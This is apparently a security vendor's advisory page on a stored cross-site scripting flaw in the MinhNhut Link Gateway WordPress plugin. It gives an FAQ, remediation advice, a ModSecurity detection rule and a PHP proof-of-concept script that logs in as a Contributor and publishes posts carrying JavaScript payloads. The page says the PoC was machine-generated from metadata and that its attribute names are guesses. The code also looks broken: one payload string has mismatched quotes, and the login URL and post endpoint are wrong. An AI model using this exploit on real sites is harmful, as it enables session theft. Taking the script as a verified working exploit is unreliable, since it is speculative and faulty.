What is CVE-2026-3333?

CVE-2026-3333 is a stored cross-site scripting (XSS) vulnerability in the MinhNhut Link Gateway plugin for WordPress, affecting versions up to 3.6.1. It allows authenticated users with Contributor-level access or higher to inject arbitrary scripts via the plugin’s ‘linkgate’ shortcode.

How does this vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping of user-supplied shortcode attributes. Attackers can create or edit posts with malicious scripts embedded in shortcode attributes, which execute in the browsers of users viewing the affected content.

Who is affected by CVE-2026-3333?

Any WordPress site using the MinhNhut Link Gateway plugin version 3.6.1 or earlier is at risk. Specifically, authenticated users with Contributor-level access or higher can exploit this vulnerability to inject malicious scripts.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the MinhNhut Link Gateway plugin installed on your WordPress site. If it is version 3.6.1 or earlier, you are at risk for this vulnerability.

What are the practical implications of the CVSS score?

The CVSS score of 6.4 indicates a medium severity level, suggesting that while exploitation requires authenticated access, it can lead to significant impacts such as session hijacking or content manipulation. Administrators should take this risk seriously.

How can I mitigate the risk of this vulnerability?

To mitigate this vulnerability, update the MinhNhut Link Gateway plugin to the latest version that addresses the issue. Additionally, ensure that all user-supplied input is properly sanitized and escaped using WordPress security functions.

What steps should I take if my site has been compromised?

If your site has been compromised, immediately remove any malicious scripts, change user passwords, and review user roles and permissions. Consider restoring your site from a clean backup and conduct a security audit to prevent future issues.

What does 'authenticated stored XSS' mean?

Authenticated stored XSS refers to a type of vulnerability where an attacker with valid credentials can store malicious scripts in the database. These scripts execute in the context of other users when they access the affected content, leading to potential data theft or site manipulation.

How does the proof of concept demonstrate the vulnerability?

The proof of concept illustrates how an attacker can use a script to authenticate as a Contributor and inject a malicious payload into a post using the vulnerable shortcode. This shows the practical steps an attacker would take to exploit the vulnerability.

What coding practices can prevent such vulnerabilities?

To prevent vulnerabilities like CVE-2026-3333, developers should implement proper input validation and output escaping for all user-supplied data. Using WordPress functions like sanitize_text_field() and esc_html() can help ensure that data is safe before storage and display.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 26, 2026

CVE-2026-3333: MinhNhut Link Gateway <= 3.6.1 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes (minhnhut-link-gateway)

CVE ID CVE-2026-3333

Plugin minhnhut-link-gateway

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 3.6.1

Patched Version —

Disclosed March 19, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-3333 (metadata-based):
The MinhNhut Link Gateway WordPress plugin contains an authenticated stored cross-site scripting (XSS) vulnerability in versions up to and including 3.6.1. The vulnerability exists in the plugin’s ‘linkgate’ shortcode handler. Attackers with Contributor-level permissions or higher can inject malicious scripts into posts or pages. These scripts execute when users view the compromised content.

Atomic Edge research identifies insufficient input sanitization and output escaping of user-supplied shortcode attributes as the root cause. The CWE-79 classification confirms improper neutralization of input during web page generation. The vulnerability description indicates the plugin fails to properly sanitize attribute values before storing them in the database. It also fails to escape these values when rendering the shortcode output. These conclusions are inferred from the CWE classification and vulnerability description, not confirmed via source code analysis.

Exploitation requires an authenticated attacker with at least Contributor-level access. The attacker creates or edits a post containing the ‘[linkgate]’ shortcode with malicious attributes. A typical payload would embed JavaScript within an attribute value like ‘[linkgate custom_attribute=”alert(document.cookie)”]’. The exact attribute names are unknown without source code, but attackers would test common parameters. The malicious script executes in visitors’ browsers when they view the post containing the shortcode.

Remediation requires implementing proper input validation and output escaping. The plugin should sanitize all user-supplied shortcode attributes using WordPress functions like `sanitize_text_field()` or `wp_kses()`. Output should be escaped with `esc_attr()` for HTML attributes and `esc_html()` for text content. WordPress shortcode APIs provide built-in attribute handling that should be utilized. A patch would also need to ensure existing malicious content is sanitized upon display.

Successful exploitation allows attackers to perform actions within victims’ browser contexts. Attackers can steal session cookies, redirect users to malicious sites, or modify page content. Since the vulnerability requires Contributor access, attackers could compromise administrator accounts by targeting them with cookie theft payloads. The stored nature means a single injection affects all users viewing the compromised page. The CVSS score of 6.4 reflects medium confidentiality and integrity impacts with no availability impact.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-3333 (metadata-based)
# This rule targets the stored XSS vulnerability in the MinhNhut Link Gateway plugin.
# The rule blocks POST requests to the WordPress post editor containing malicious
# 'linkgate' shortcode attributes with JavaScript payloads.
SecRule REQUEST_URI "@rx ^/wp-admin/(post.php|post-new.php)$" 
  "id:20263333,phase:2,deny,status:403,chain,msg:'CVE-2026-3333: MinhNhut Link Gateway Stored XSS via Shortcode',severity:'CRITICAL',tag:'CVE-2026-3333',tag:'WordPress',tag:'Plugin',tag:'XSS'"
  SecRule REQUEST_METHOD "@streq POST" "chain"
    SecRule ARGS_POST:content "@rx \[linkgate[^\]]*?(javascript:|<script|on\w+\s*=)" 
      "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,ctl:auditLogParts=+E"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-3333 - MinhNhut Link Gateway <= 3.6.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes
<?php
/**
 * Proof of Concept for CVE-2026-3333
 * This script demonstrates exploitation of the stored XSS vulnerability in the MinhNhut Link Gateway plugin.
 * Assumptions based on metadata:
 * 1. The vulnerability exists in the 'linkgate' shortcode handler
 * 2. Contributor-level authentication is required
 * 3. Shortcode attributes are not properly sanitized
 * 4. The plugin uses standard WordPress authentication mechanisms
 */

$target_url = 'http://example.com/wp-login.php';
$username = 'contributor_user';
$password = 'contributor_pass';

// Initialize cURL session for cookie handling
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

// Step 1: Authenticate as Contributor
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
);

curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
$response = curl_exec($ch);

// Check authentication success by looking for dashboard elements
if (strpos($response, 'wp-admin-bar') === false) {
    die('Authentication failed. Check credentials.');
}

// Step 2: Create a new post with malicious shortcode
// The exact vulnerable attribute is unknown, so we test multiple possibilities
$malicious_payloads = array(
    '[linkgate url="javascript:alert(document.cookie)"]Click Here[/linkgate]',
    '[linkgate custom="<script>alert(document.domain)</script>"]',
    '[linkgate attr1="' onmouseover="alert('XSS')"]',
    '[linkgate href="data:text/html,<script>alert(1)</script>"]Test[/linkgate]'
);

$post_url = 'http://example.com/wp-admin/post-new.php';
$nonce_pattern = '/name="_wpnonce" value="([a-f0-9]+)"/';

// Get the post creation page to extract nonce
curl_setopt($ch, CURLOPT_URL, $post_url);
curl_setopt($ch, CURLOPT_POST, false);
$response = curl_exec($ch);

preg_match($nonce_pattern, $response, $matches);
$nonce = $matches[1] ?? '';

if (empty($nonce)) {
    die('Failed to extract nonce for post creation.');
}

// Create post with first payload
$post_data = array(
    'post_title' => 'Test Post with Malicious Shortcode',
    'content' => $malicious_payloads[0],
    'publish' => 'Publish',
    '_wpnonce' => $nonce,
    '_wp_http_referer' => '/wp-admin/post-new.php',
    'post_type' => 'post',
    'post_status' => 'publish'
);

curl_setopt($ch, CURLOPT_URL, $post_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
$response = curl_exec($ch);

// Extract post ID from response
if (preg_match('/post=([0-9]+)&/', $response, $matches)) {
    $post_id = $matches[1];
    echo "Exploit successful. Post created with ID: $post_idn";
    echo "Visit: http://example.com/?p=$post_id to trigger the XSS payload.n";
} else {
    echo "Post may have been created. Check WordPress dashboard.n";
}

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2026-3333?
Overview of the vulnerability
CVE-2026-3333 is a stored cross-site scripting (XSS) vulnerability in the MinhNhut Link Gateway plugin for WordPress, affecting versions up to 3.6.1. It allows authenticated users with Contributor-level access or higher to inject arbitrary scripts via the plugin’s ‘linkgate’ shortcode.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping of user-supplied shortcode attributes. Attackers can create or edit posts with malicious scripts embedded in shortcode attributes, which execute in the browsers of users viewing the affected content.
Who is affected by CVE-2026-3333?
User roles and permissions
Any WordPress site using the MinhNhut Link Gateway plugin version 3.6.1 or earlier is at risk. Specifically, authenticated users with Contributor-level access or higher can exploit this vulnerability to inject malicious scripts.
How can I check if my site is vulnerable?
Identifying affected installations
To determine if your site is vulnerable, check the version of the MinhNhut Link Gateway plugin installed on your WordPress site. If it is version 3.6.1 or earlier, you are at risk for this vulnerability.
What are the practical implications of the CVSS score?
Understanding the risk level
The CVSS score of 6.4 indicates a medium severity level, suggesting that while exploitation requires authenticated access, it can lead to significant impacts such as session hijacking or content manipulation. Administrators should take this risk seriously.
How can I mitigate the risk of this vulnerability?
Recommended actions for site administrators
To mitigate this vulnerability, update the MinhNhut Link Gateway plugin to the latest version that addresses the issue. Additionally, ensure that all user-supplied input is properly sanitized and escaped using WordPress security functions.
What steps should I take if my site has been compromised?
Response to exploitation
If your site has been compromised, immediately remove any malicious scripts, change user passwords, and review user roles and permissions. Consider restoring your site from a clean backup and conduct a security audit to prevent future issues.
What does 'authenticated stored XSS' mean?
Clarifying the vulnerability type
Authenticated stored XSS refers to a type of vulnerability where an attacker with valid credentials can store malicious scripts in the database. These scripts execute in the context of other users when they access the affected content, leading to potential data theft or site manipulation.
How does the proof of concept demonstrate the vulnerability?
Understanding the exploitation method
The proof of concept illustrates how an attacker can use a script to authenticate as a Contributor and inject a malicious payload into a post using the vulnerable shortcode. This shows the practical steps an attacker would take to exploit the vulnerability.
What coding practices can prevent such vulnerabilities?
Best practices for secure coding
To prevent vulnerabilities like CVE-2026-3333, developers should implement proper input validation and output escaping for all user-supplied data. Using WordPress functions like sanitize_text_field() and esc_html() can help ensure that data is safe before storage and display.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations